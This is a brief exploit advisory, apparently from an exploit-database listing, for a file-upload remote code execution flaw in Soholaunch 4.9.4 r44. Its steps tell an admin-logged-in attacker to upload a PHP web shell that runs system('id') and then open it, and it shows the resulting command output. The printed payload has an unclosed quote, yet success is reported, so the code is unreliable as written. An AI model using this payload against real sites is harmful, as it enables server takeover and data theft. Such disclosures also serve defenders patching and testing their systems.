Headline
Soholaunch 4.9.4 r44 Shell Upload
Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.
## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://livesite.com/### Version : v4.9.4 r441 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file Payload : <?php echo system('id); ?>2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.phpResult: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)